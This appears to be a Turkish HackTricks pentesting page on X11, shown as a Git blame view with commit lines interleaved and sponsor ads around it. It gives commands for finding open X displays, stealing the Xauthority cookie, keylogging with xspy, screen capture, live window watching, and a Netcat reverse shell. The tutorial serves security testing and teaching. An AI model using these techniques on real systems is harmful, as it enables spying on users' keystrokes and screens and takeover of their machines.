Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-17 22:48:32 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/6000-pentesting-x11.md

195 lines
8.8 KiB
Markdown
Raw Normal View History

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
# 6000 - Pentesting X11
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
HackTricks'ı desteklemenin diğer yolları:
arte
2024-01-03 11:42:55 +01:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
Translated to Turkish
2024-02-10 18:14:16 +00:00
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Bize katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek katkıda bulunun.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
hp
2023-02-27 10:28:45 +01:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
Deneyimli hackerlar ve ödül avcıları ile iletişim kurmak için [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) sunucusuna katılın!
hp
2023-02-27 10:28:45 +01:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
**Hackleme İçgörüleri**\
Hackleme heyecanını ve zorluklarını inceleyen içeriklerle etkileşime geçin
hp
2023-07-14 17:03:41 +02:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
**Gerçek Zamanlı Hack Haberleri**\
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
Hızlı tempolu hackleme dünyasında gerçek zamanlı haberler ve içgörülerle güncel kalın
hp
2023-07-14 17:03:41 +02:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
**En Son Duyurular**\
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
Yeni ödül avı başlatmaları ve önemli platform güncellemeleri hakkında bilgilenin
new link
2022-11-05 10:07:43 +01:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
**Bize katılın** [**Discord**](https://discord.com/invite/N3FrSbmwdy) ve bugün en iyi hackerlarla işbirliğine başlayın!
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
## Temel Bilgiler
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
**X Window Sistemi** (X), UNIX tabanlı işletim sistemlerinde yaygın olan çok yönlü bir pencereleme sistemidir. Grafik **kullanıcı arayüzleri (GUI'ler)** oluşturmak için bir çerçeve sağlar, bireysel programlar kullanıcı arayüzü tasarımını ele alır. Bu esneklik, X ortamında çeşitli ve özelleştirilebilir deneyimler sunar.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
**Varsayılan port:** 6000
GitBook: [#2777] gitbookissooooo slow I cannot write
2021-10-18 11:21:18 +00:00
```
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
PORT STATE SERVICE
6000/tcp open X11
```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
## Sıralama
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
**Anonim bağlantı** için kontrol edin:
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script x11-access -p <PORT> <IP>
msf> use auxiliary/scanner/x11/open_x11
```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
#### Yerel Sıralama
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
Kullanıcı ev dizinindeki **`.Xauthority`** dosyası, **yetkilendirme için X11 tarafından kullanılır**. [**buradan**](https://stackoverflow.com/a/37367518):
Update 6000-pentesting-x11.md Add example for `xxd` and `w`. # Reference https://0xdf.gitlab.io/2022/11/21/htb-squashed.html
2023-12-29 00:56:54 -08:00
```bash
$ xxd ~/.Xauthority
00000000: 0100 0006 6d61 6e65 7063 0001 3000 124d ............0..M
00000010: 4954 2d4d 4147 4943 2d43 4f4f 4b49 452d IT-MAGIC-COOKIE-
00000020: 3100 108f 52b9 7ea8 f041 c49b 85d8 8f58 1...R.~..A.....X
00000030: 041d ef ...
```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
> MIT-sihirli-biskuvi-1: 128 bitlik bir anahtar ("bisküvi") oluşturulur, \~/.Xauthority dosyasına (veya XAUTHORITY çevresel değişkeninin işaret ettiği yere) depolanır. İstemci bunu düz metin olarak sunar! sunucu, bu "bisküvi"nin bir kopyasına sahip olup olmadığını kontrol eder ve eğer öyleyse bağlantı izin verilir. anahtar DMX tarafından oluşturulur.
GITBOOK-3869: change request with no subject merged in GitBook
2023-04-07 00:41:31 +00:00
{% hint style="warning" %}
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
**Bisküviyi kullanmak** için çevresel değişkeni ayarlamanız gerekir: **`export XAUTHORITY=/path/to/.Xauthority`**
GITBOOK-3869: change request with no subject merged in GitBook
2023-04-07 00:41:31 +00:00
{% endhint %}
Translated to Turkish
2024-02-10 18:14:16 +00:00
#### Yerel Sorgulama Oturumu
Update 6000-pentesting-x11.md Add example for `xxd` and `w`. # Reference https://0xdf.gitlab.io/2022/11/21/htb-squashed.html
2023-12-29 00:56:54 -08:00
```bash
Translated to Turkish
2024-02-10 18:14:16 +00:00
$ w
23:50:48 up 1 day, 10:32, 1 user, load average: 0.29, 6.48, 7.12
Update 6000-pentesting-x11.md Add example for `xxd` and `w`. # Reference https://0xdf.gitlab.io/2022/11/21/htb-squashed.html
2023-12-29 00:56:54 -08:00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user tty7 :0 13Oct23 76days 13:37 2.20s xfce4-session
```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
Örnekte, `localhost:0` üzerinde xfce4-session çalışıyordu.
Update 6000-pentesting-x11.md Add example for `xxd` and `w`. # Reference https://0xdf.gitlab.io/2022/11/21/htb-squashed.html
2023-12-29 00:56:54 -08:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
## Bağlantıyı Doğrula
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```bash
xdpyinfo -display <ip>:<display>
xwininfo -root -tree -display <IP>:<display> #Ex: xwininfo -root -tree -display 10.5.5.12:0
```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
## Keyloggin
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
[xspy](http://tools.kali.org/sniffingspoofing/xspy) klavye tuş vuruşlarını dinlemek için kullanılır.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
Örnek Çıktı:
GitBook: [#2777] gitbookissooooo slow I cannot write
2021-10-18 11:21:18 +00:00
```
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
xspy 10.9.xx.xx
opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab
```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
## Ekran görüntüleri yakalama
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```bash
xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
convert screenshot.xwd screenshot.png
```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
## Uzak Masaüstü Görünümü
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
Yol: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
GitBook: [#2777] gitbookissooooo slow I cannot write
2021-10-18 11:21:18 +00:00
```
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
./xrdp.py <IP:0>
```
Translated to Turkish
2024-02-10 18:14:16 +00:00
Yol: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
Öncelikle xwininfo kullanarak pencerenin kimliğini bulmamız gerekiyor.
GitBook: [#2777] gitbookissooooo slow I cannot write
2021-10-18 11:21:18 +00:00
```
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
xwininfo -root -display 10.9.xx.xx:0
xwininfo: Window id: 0x45 (the root window) (has no name)
Absolute upper-left X: 0
Absolute upper-left Y: 0
Relative upper-left X: 0
Relative upper-left Y: 0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners: +0+0 -0+0 -0-0 +0-0
-geometry 1024x768+0+0
```
**XWatchwin**
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
**Canlı izleme** için kullanmamız gerekiyor
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```bash
./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9.xx.xx:0 -w 0x45
```
Translated to Turkish
2024-02-10 18:14:16 +00:00
## Kabuk Al
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
Bu bölümde, X sunucularına kabuk almak için kullanılabilecek bazı teknikler ele alınmaktadır.
Translated to Turkish
2024-02-10 18:14:16 +00:00
```
msf> use exploit/unix/x11/x11_keyboard_exec
```
Diğer yol:
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
**Ters Kabuk (Reverse Shell):** Xrdp ayrıca Netcat aracılığıyla ters kabuk almayı da sağlar. Aşağıdaki komutu yazın:
Translated to Turkish
2024-02-10 18:14:16 +00:00
```bash
./xrdp.py \<IP:0> no-disp
```
Arayüzde **R-shell seçeneğini** görebilirsiniz.
Ardından, yerel sisteminizde 5555 numaralı portta bir **Netcat dinleyici** başlatın.
```bash
nc -lvp 5555
```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
Sonra, IP adresinizi ve bağlantı noktanızı **R-Shell** seçeneğine girin ve kabuk almak için **R-shell** üzerine tıklayın
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
## Referanslar
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
a
2024-02-08 22:36:35 +01:00
* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
GitBook: [master] one page modified
2020-09-24 20:01:29 +00:00
GITBOOK-3816: No subject
2023-03-05 19:54:13 +00:00
## Shodan
GitBook: [master] one page modified
2020-09-24 20:01:29 +00:00
* `port:6000 x11`
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
hp
2023-07-14 17:03:41 +02:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) sunucusuna katılarak deneyimli hackerlar ve ödül avcıları ile iletişim kurun!
new link
2022-11-05 10:07:43 +01:00
hackenproof
2023-12-04 16:45:05 +01:00
**Hacking Insights**\
Translated to Turkish
2024-02-10 18:14:16 +00:00
Hacking'in heyecanını ve zorluklarını inceleyen içeriklerle etkileşime geçin
hp
2023-02-27 10:28:45 +01:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
**Gerçek Zamanlı Hack Haberleri**\
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
Hızlı tempolu hacking dünyasında gerçek zamanlı haberler ve içgörülerle güncel kalın
hp
2023-02-27 10:28:45 +01:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
**En Son Duyurular**\
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
Yeni ödül avcılıkları ve önemli platform güncellemeleri hakkında bilgilenin
hp
2023-02-27 10:28:45 +01:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
**Bize katılın** [**Discord**](https://discord.com/invite/N3FrSbmwdy) ve bugün en iyi hackerlarla işbirliğine başlayın!
new link
2022-11-05 10:07:43 +01:00
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
<summary><strong>Sıfırdan kahraman olacak şekilde AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
HackTricks'i desteklemenin diğer yolları:
arte
2024-01-03 11:42:55 +01:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
Translated to Turkish
2024-02-10 18:14:16 +00:00
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:13:19 +00:00
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking hilelerinizi paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Reference in a new issue Copy permalink